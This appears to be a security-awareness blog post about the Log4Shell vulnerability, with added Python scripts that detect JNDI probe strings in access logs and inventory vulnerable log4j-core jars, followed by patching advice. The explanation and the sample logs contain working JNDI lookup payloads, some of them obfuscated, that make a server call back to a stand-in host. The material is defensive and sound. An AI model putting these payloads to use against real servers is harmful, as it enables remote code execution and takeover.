Log4Shell hack

Log4Shell: the simplest of hacks


Imagine being able to hack a server simply by pasting a block of text into a chat window. That's exactly what happened to Minecraft servers over the weekend. The newly disclosed vulnerability is called Log4Shell (CVE-2021-44228) and it exploits a previously unknown weakness in Log4j 2, a common Java logging library used by thousands of servers around the world. The weakness is in the library's lookup feature: if a string like ${jndi:ldap://<attacker's server>/x} ends up in a log message, Log4j resolves it, connects to the attacker's server and can load and run Java code that server sends back. Servers log a great deal of what users send them, so a single line of text typed into a login field, a chat window or even a web request header can be enough for an attacker to take complete control of the server.
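The chat-window trick works because Log4j 2 evaluates lookups inside the strings it logs, and attackers quickly started hiding the ${jndi:...} string behind nested lookups and URL encoding. As an added example that is not part of the original post, here is a small Python scanner that flags Log4Shell probe strings in web server access logs, including those common obfuscations. The log lines it runs over are constructed (documentation IP ranges, not real traffic).

```python
"""Flag Log4Shell (CVE-2021-44228) probe strings in web server access logs.

The trigger is a Log4j 2 lookup of the form ${jndi:<scheme>://...}. Real
attack traffic hides it behind nested lookups that resolve to single letters,
e.g. ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}, and often
URL-encodes the whole thing. A plain search for "${jndi:" therefore misses
most of it; this scanner decodes and collapses those tricks first.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Nested lookups that evaluate to one literal character:
#   ${lower:j} / ${upper:J}   -> j   (case-conversion lookups)
#   ${::-j}                   -> j   (empty lookup with default value "j")
#   ${env:NO_SUCH_VAR:-j}     -> j   (unset variable with default value "j")
SINGLE_CHAR_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^}$])\}"   # group 1: case lookups
    r"|\$\{[^}${]*:-([^}$])\}"          # group 2: default-value lookups
)

# The lookup we actually care about, after normalization; group 1 is the
# JNDI scheme (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, rounds: int = 5) -> str:
    """URL-decode, then repeatedly collapse single-character nested lookups."""
    text = unquote(text)
    for _ in range(rounds):
        collapsed = SINGLE_CHAR_LOOKUP.sub(
            lambda m: (m.group(1) or m.group(2)).lower(), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_log(log_text: str) -> List[Dict]:
    """Return one record per log line that carries a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            hits.append({
                "line": lineno,
                "src_ip": line.split(" ", 1)[0],
                "scheme": m.group(1).lower(),
                "payload": norm[m.start():m.start() + 80],
            })
    return hits


# Constructed sample lines in Apache combined log format (not real traffic).
# 1: plain payload in the User-Agent header
# 2: nested ${lower:..} obfuscation in the query string
# 3: URL-encoded ${::-x} obfuscation, RMI instead of LDAP
# 4: ordinary request
# 5: contains the word "jndi" in JSON but no lookup (must not be flagged)
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:23:11:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.5 - - [10/Dec/2021:23:11:09 +0000] "GET /login?user=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"
203.0.113.9 - - [10/Dec/2021:23:12:41 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Dec/2021:23:13:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2021:23:13:20 +0000] "POST /api/search?q=%7B%22jndi%22%3A1%7D HTTP/1.1" 200 80 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['src_ip']} via {hit['scheme']}: {hit['payload']}")
```

Run it against your own access logs by passing the file contents to scan_log(). The normalization step is what matters: lines 2 and 3 of the sample never contain the literal text "${jndi:" yet both resolve to it, while line 5 mentions "jndi" and is correctly left alone. The lookup list is not exhaustive (Log4j supports other lookups that attackers chained), so treat a clean result as "nothing obvious" rather than proof of no probing.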

Who's vulnerable? Twitter, iCloud and even certain Microsoft applications have been reported as affected, just to name a few. The truth is, Java is one of the most widely used programming languages on servers, particularly internet-facing servers, and Log4j 2 is the logging library inside a huge number of Java applications, so the potential reach of this vulnerability is almost incalculable: potentially every single company. So you have a vulnerability that impacts a very large share of servers, and you need no real hacking skills to exploit it: one line of text and a server for the victim to call back to. That's the reason cybersecurity experts are sounding the alarm and many are calling this the most dangerous weakness we've seen in years.

What can you do about it? Application vendors are actively issuing patches for this vulnerability. If you're hosting your own servers or running your own applications, check whether any of them use Log4j 2 (look for log4j-core jar files, including ones bundled inside larger applications). If you find it, update the library to a fixed release immediately; 2.15.0 was the first release to ship the fix, so take the newest 2.x release available when you patch. If you can't upgrade right away, Apache's documented stopgap is to delete the JndiLookup class from the log4j-core jar, which removes the code path the attack relies on. For everyone else, make sure you run your updates this week, and that includes checking the firmware on your firewalls and network switches. Virtually anything that logs what a user types, such as a login form, a chat window, a search box or a web request, could be passing that text through this bit of Java code, and that means it needs to be updated.
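To make the "check if you are using Log4j 2" step concrete, here is an added example (not from the original post, and not Apache's tooling) in Python that walks a directory tree, finds log4j-core jars, reads the version from each jar's Maven pom.properties and checks whether the JndiLookup class is still present. The fixed-release thresholds come from Apache's advisory for this CVE; the jars it builds for its stand-alone run are constructed placeholders, not real Log4j builds.

```python
"""Inventory Log4j 2 on disk and decide whether each copy is exposed to
CVE-2021-44228.

For every log4j-core jar found under a directory this reports:
  * the release version recorded in the jar's Maven pom.properties
  * whether org/apache/logging/log4j/core/lookup/JndiLookup.class is present
    (deleting that class from the jar is Apache's documented stopgap for
    installations that cannot be upgraded yet)
  * a verdict: vulnerable only if the class is present AND the version is
    below the fixed release for its branch (2.15.0; 2.12.2 on the Java 7
    branch; 2.3.1 on the Java 6 branch). Unparseable versions are treated
    as vulnerable.
Log4j 1.x is a different code base (org/apache/log4j, no JndiLookup class)
and is not affected by this CVE, so it is deliberately not matched.
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JAR_NAME = re.compile(r"^log4j-core-.*\.jar$")


def parse_version(pom_properties: str) -> Optional[Tuple[int, int, int]]:
    """Pull x.y.z out of a Maven pom.properties file; None if not numeric."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)\s*$", pom_properties, re.MULTILINE)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def is_fixed(version: Tuple[int, int, int]) -> bool:
    """True if this release already contains the CVE-2021-44228 fix."""
    if version[:2] == (2, 3):
        return version >= (2, 3, 1)     # Java 6 backport branch
    if version[:2] == (2, 12):
        return version >= (2, 12, 2)    # Java 7 backport branch
    return version >= (2, 15, 0)


def inspect_jar(path: str) -> Dict:
    """Read version and JndiLookup presence from one jar and give a verdict."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = (parse_version(jar.read(POM_PROPERTIES).decode("utf-8"))
                   if POM_PROPERTIES in names else None)
    has_jndi = JNDI_LOOKUP_CLASS in names
    fixed = version is not None and is_fixed(version)
    return {
        "path": path,
        "version": version,
        "jndi_lookup_present": has_jndi,
        "vulnerable": has_jndi and not fixed,
    }


def scan_tree(root: str) -> List[Dict]:
    """Walk a directory tree and inspect every log4j-core jar in it."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if JAR_NAME.match(name):
                full = os.path.join(dirpath, name)
                record = inspect_jar(full)
                record["path"] = os.path.relpath(full, root)
                results.append(record)
    return sorted(results, key=lambda r: r["path"])


def build_demo_tree() -> str:
    """Create fake jars for a stand-alone run (constructed, not real Log4j builds)."""
    root = tempfile.mkdtemp(prefix="log4j-scan-demo-")

    def make_jar(relpath: str, version: str, keep_jndi_class: bool) -> None:
        full = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with zipfile.ZipFile(full, "w") as jar:
            jar.writestr(POM_PROPERTIES,
                         f"version={version}\ngroupId=org.apache.logging.log4j\n"
                         f"artifactId=log4j-core\n")
            if keep_jndi_class:
                # placeholder bytes standing in for the real class file
                jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")

    make_jar("app/lib/log4j-core-2.14.1.jar", "2.14.1", True)      # exposed
    make_jar("legacy/lib/log4j-core-2.14.1.jar", "2.14.1", False)  # class removed
    make_jar("new/lib/log4j-core-2.17.1.jar", "2.17.1", True)      # patched release
    make_jar("old/lib/log4j-core-2.12.4.jar", "2.12.4", True)      # fixed Java 7 branch
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for r in scan_tree(demo_root):
        print(f"{r['path']:40} version={r['version']} "
              f"JndiLookup={'present' if r['jndi_lookup_present'] else 'removed'} "
              f"{'VULNERABLE' if r['vulnerable'] else 'ok'}")
```

On a real host, point scan_tree() at an application root instead of build_demo_tree(). The stopgap mentioned above is `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`; after running it, this script reports the jar as mitigated because the class is gone, which is what the "legacy" entry in the demo shows. Caveat: this only opens plain jars, so a log4j-core copy nested inside a WAR, EAR or fat jar, or a shaded copy under a different package name, is not found; unpack those first or use a dedicated scanner.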

For more information, read the details here: CVE-2021-44228 (mitre.org)

Stay on the lookout for holiday scams - fake delivery receipts are exceptionally popular right now, as are fake Amazon purchase emails.

HIPAA Security Reminders


HIPAA Security Suite has developed a weekly HIPAA Security Reminder series that’s FREE for all of us who are responsible for, or engaged in, the use and protection of PHI.

Pursuant to Section 164.308(a)(5) of the HIPAA Security Rule, the Standard states: Implement a security awareness and training program for all members of its workforce (including management).

This standard is part of our Best Practices Recommendations for HIPAA Security Suite users, but it’s available for FREE to anyone who wants to comply with HIPAA using the easiest, best tools available.
